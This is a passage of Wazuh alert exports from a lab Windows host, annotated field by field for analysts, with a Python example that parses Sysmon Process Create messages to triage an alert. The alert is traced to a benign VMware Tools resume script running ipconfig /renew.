data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:52:26.7422645Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 216633 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-17 16:52:26.740
ProcessGuid: {94294ddc-ea80-67fe-0d00-000000000e00}
ProcessId: 908
Image: C:\WINDOWS\system32\svchost.exe
TargetObject: HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\8348\Reason
Details: DWORD (0x00000004)
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:52:26.740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea80-67fe-0d00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\TermReason\\8348\\Reason No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: DWORD (0x00000004) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows command prompt started by an abnormal process Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92052 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534015.563163 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:35.4122124Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 218350 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-20 01:40:34.927
ProcessGuid: {94294ddc-5092-6804-8308-000000000e00}
ProcessId: 13156
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
CurrentDirectory: C:\WINDOWS\system32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
ParentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00}
ParentProcessId: 3220
ParentImage: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
ParentCommandLine: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:40:34.927 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-5092-6804-8308-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13156 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows Command Processor No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: Cmd.Exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\WINDOWS\\system32\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Suspicious Windows cmd shell execution Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92032 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087', 'T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery', 'Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery', 'Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534015.568786 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:35.6081940Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 218360 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-20 01:40:35.504
ProcessGuid: {94294ddc-5093-6804-8508-000000000e00}
ProcessId: 2096
Image: C:\Windows\System32\conhost.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Console Window Host
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: CONHOST.EXE
CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
CurrentDirectory: C:\WINDOWS
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D
ParentProcessGuid: {94294ddc-5092-6804-8308-000000000e00}
ParentProcessId: 13156
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:40:35.504 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-5093-6804-8508-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2096 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\conhost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Console Window Host No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: CONHOST.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\WINDOWS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-5092-6804-8308-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13156 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Suspicious Windows cmd shell execution Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92032 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087', 'T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery', 'Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery', 'Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534021.574270 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:40.1776576Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 218817 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-20 01:40:40.137
ProcessGuid: {94294ddc-5098-6804-9208-000000000e00}
ProcessId: 9944
Image: C:\Windows\System32\ipconfig.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: IP Configuration Utility
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: ipconfig.exe
CommandLine: C:\WINDOWS\system32\ipconfig /renew
CurrentDirectory: C:\Windows\System32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B
ParentProcessGuid: {94294ddc-5092-6804-8308-000000000e00}
ParentProcessId: 13156
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:40:40.137 Time Sysmon recorded the event, in UTC. Build timelines on this, not on the Wazuh alert id, which is the manager's receive time.
data.win.eventdata.processGuid: {94294ddc-5098-6804-9208-000000000e00} Sysmon's globally unique id for the new process. PIDs are reused and reset at reboot; this GUID is not, so join later Sysmon events (network, file, registry) on it. Its second and third segments are the process start time as a Unix epoch: 0x68045098 here is 2025-04-20 01:40:40 UTC, matching UtcTime.
data.win.eventdata.processId: 9944 PID of the new process. Ambiguous over time, so pair it with ProcessGuid.
data.win.eventdata.image: C:\\Windows\\System32\\ipconfig.exe Full path of the executable that started. Here the genuine ipconfig.exe in System32.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) Version resource of the binary; build 26100 is Windows 11 24H2 / Server 2025. A version that does not match the host's OS build is a sign of an out-of-place copy.
data.win.eventdata.description: IP Configuration Utility Description string from the version resource. Attacker-controllable text; never treat it as proof of origin.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the version resource, same caveat.
data.win.eventdata.company: Microsoft Corporation Company string from the version resource, same caveat: the Authenticode signature and the hash establish origin, not these strings.
data.win.eventdata.originalFileName: ipconfig.exe Internal file name from the version resource. If it differs from the basename of Image the binary was renamed, a common masquerading trick (T1036). Here they match.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\ipconfig /renew Full command line as launched. ipconfig /renew re-requests the host's DHCP lease.
data.win.eventdata.currentDirectory: C:\\Windows\\System32\\ Working directory of the new process.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the process runs as. SYSTEM is the most privileged local account, so anything unexpected here matters.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Sysmon id of the logon session the process belongs to; joins to the corresponding 4624 logon event.
data.win.eventdata.logonId: 0x3e7 Windows logon session id. 0x3e7 (999) is the fixed id of the SYSTEM session, so this is a service-context process, not a logged-on user.
data.win.eventdata.terminalSessionId: 0 Windows session number. 0 is the non-interactive session services run in; 1 and up are interactive desktops.
data.win.eventdata.integrityLevel: System Mandatory integrity level (Low, Medium, High, System). System means the process can touch anything on the host.
data.win.eventdata.hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B Hashes of the image file, in whichever algorithms Sysmon was configured to compute (here SHA256 only). Pivot on it to threat intel and to known-good lists.
data.win.eventdata.parentProcessGuid: {94294ddc-5092-6804-8308-000000000e00} ProcessGuid of the parent; join it to the parent's own Event ID 1 to walk the chain upwards.
data.win.eventdata.parentProcessId: 13156 PID of the parent.
data.win.eventdata.parentImage: C:\\Windows\\System32\\cmd.exe Executable of the parent. A shell spawning a network utility as SYSTEM deserves a look at the parent's command line.
data.win.eventdata.parentCommandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" The parent's command line explains this alert: cmd.exe /c is running VMware Tools' resume-vm-default.bat, the power-operation script VMware Tools runs when a VM resumes, and renewing the DHCP lease is what that script does. The doubled quotes are cmd.exe's own quoting, logged as-is.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM Account the parent runs as; SYSTEM is consistent with the VMware Tools service having launched the script.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
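The Process Create record above arrives twice: as the rendered text in data.win.system.message and as the parsed eventdata.* fields. When all you have is the text (an exported alert, a ticket paste), parsing it yourself is the first step, and the facts worth pulling out are the ones this alert turns on: who the process runs as, whether it is the binary it claims to be, and which script the parent shell was handed. The Python below is an added example, not code from this page, from Wazuh or from Sysmon. SAMPLE_MESSAGE is copied from the alert above (trimmed to the fields used); the function names, the SYSTEM_LOGON_ID constant and the list of script extensions are this example's own choices, and the quoted-image handling in command_arguments goes beyond the page's own sample.

```python
"""Parse the rendered Sysmon text in data.win.system.message and pull the
triage facts out of a Process Create (Sysmon Event ID 1) record.
Added example; SAMPLE_MESSAGE is copied from the alert above (trimmed),
the names and constants below are this example's own."""
import re

SYSTEM_LOGON_ID = 0x3E7  # well-known logon session id of NT AUTHORITY\SYSTEM
SCRIPT_EXTENSIONS = ("bat", "cmd", "ps1", "vbs", "js", "wsf")

# Copied from the alert on this page; cmd.exe's doubled quotes are kept as logged.
SAMPLE_MESSAGE = r"""Process Create:
RuleName: -
UtcTime: 2025-04-20 01:40:40.137
ProcessGuid: {94294ddc-5098-6804-9208-000000000e00}
ProcessId: 9944
Image: C:\Windows\System32\ipconfig.exe
OriginalFileName: ipconfig.exe
CommandLine: C:\WINDOWS\system32\ipconfig /renew
CurrentDirectory: C:\Windows\System32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B
ParentProcessGuid: {94294ddc-5092-6804-8308-000000000e00}
ParentProcessId: 13156
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
ParentUser: NT AUTHORITY\SYSTEM"""

_FIELD_RE = re.compile(r"^([A-Za-z]+):\s?(.*)$")
_SCRIPT_RE = re.compile(r'([A-Za-z]:\\[^"]*?\.(?:%s))\b' % "|".join(SCRIPT_EXTENSIONS), re.I)


def parse_sysmon_message(text):
    """Return (event_name, {field: value}). Line 1 is the event name; every
    other line is "Key: Value", split only at the leading "Key:" so values
    that contain colons (timestamps) survive intact."""
    lines = text.strip().splitlines()
    fields = {}
    for line in lines[1:]:
        m = _FIELD_RE.match(line.rstrip("\r"))
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return lines[0].rstrip(":").strip(), fields


def parse_hashes(value):
    """'SHA256=...,MD5=...' -> {'SHA256': '...', 'MD5': '...'} (hex lower-cased)."""
    pairs = (part.partition("=") for part in value.split(","))
    return {a.strip().upper(): d.strip().lower() for a, sep, d in pairs if sep}


def script_in_command_line(cmdline):
    """First script path handed to an interpreter, or None. The path is
    matched on its own, so cmd.exe's doubled-quote /c form needs no special case."""
    m = _SCRIPT_RE.search(cmdline)
    return m.group(1) if m else None


def command_arguments(cmdline):
    """Everything after the image token, honouring a quoted image path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[end + 1:].strip() if end != -1 else ""
    return cmdline.partition(" ")[2].strip()


def analyze_process_create(fields):
    """Reduce an Event ID 1 record to the facts an analyst checks first."""
    image_name = fields.get("Image", "").rsplit("\\", 1)[-1]
    original = fields.get("OriginalFileName", "-")
    return {
        "image_name": image_name.lower(),
        "parent_name": fields.get("ParentImage", "").rsplit("\\", 1)[-1].lower(),
        "arguments": command_arguments(fields.get("CommandLine", "")),
        # OriginalFileName comes from the version resource; a mismatch with the
        # on-disk name means the binary was renamed (masquerading, T1036).
        "renamed_binary": original not in ("-", "?") and original.lower() != image_name.lower(),
        "runs_as_system": int(fields.get("LogonId", "0"), 16) == SYSTEM_LOGON_ID
        and fields.get("IntegrityLevel") == "System",
        "non_interactive": fields.get("TerminalSessionId") == "0",  # session 0 = services
        "parent_script": script_in_command_line(fields.get("ParentCommandLine", "")),
        "sha256": parse_hashes(fields.get("Hashes", "")).get("SHA256"),
    }


if __name__ == "__main__":
    name, fields = parse_sysmon_message(SAMPLE_MESSAGE)
    print(name)
    for key, value in analyze_process_create(fields).items():
        print(f"  {key:16} {value}")
```

Run against the sample, the analysis comes back with runs_as_system True, renamed_binary False and parent_script pointing at VMware's resume-vm-default.bat: a SYSTEM-level ipconfig with that parent is the VM-resume script doing its job. The same image with renamed_binary True, or a parent script sitting under a user profile, is the variant worth chasing.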
rule.description: New Windows Service Created Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61138 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534022.579734 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager The event provider. services.exe logs 7045 itself when it registers a service, so the installer's identity is not in this event; pair it with Sysmon Event ID 1 for the installer, or Security 4697, for that.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} GUID of the provider; stable across languages and renames, so prefer it to providerName in rules.
data.win.system.eventSourceName: Service Control Manager Legacy (pre-Vista) event source name; the same as the provider here.
data.win.system.eventID: 7045 "A service was installed in the system". The canonical signal for T1543.003 persistence and for PsExec-style remote execution, which installs a temporary service.
data.win.system.version: 0 Version of the event template; a bump means the field layout changed.
data.win.system.level: 4 4 = Informational (1 Critical, 2 Error, 3 Warning, 4 Information, 5 Verbose). Level says nothing about security relevance; 7045 is always Informational.
data.win.system.task: 0 Task category; 0 means the provider does not set one.
data.win.system.opcode: 0 0 = Info. Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:32:37.8788463Z Time the event was written on the endpoint, in UTC.
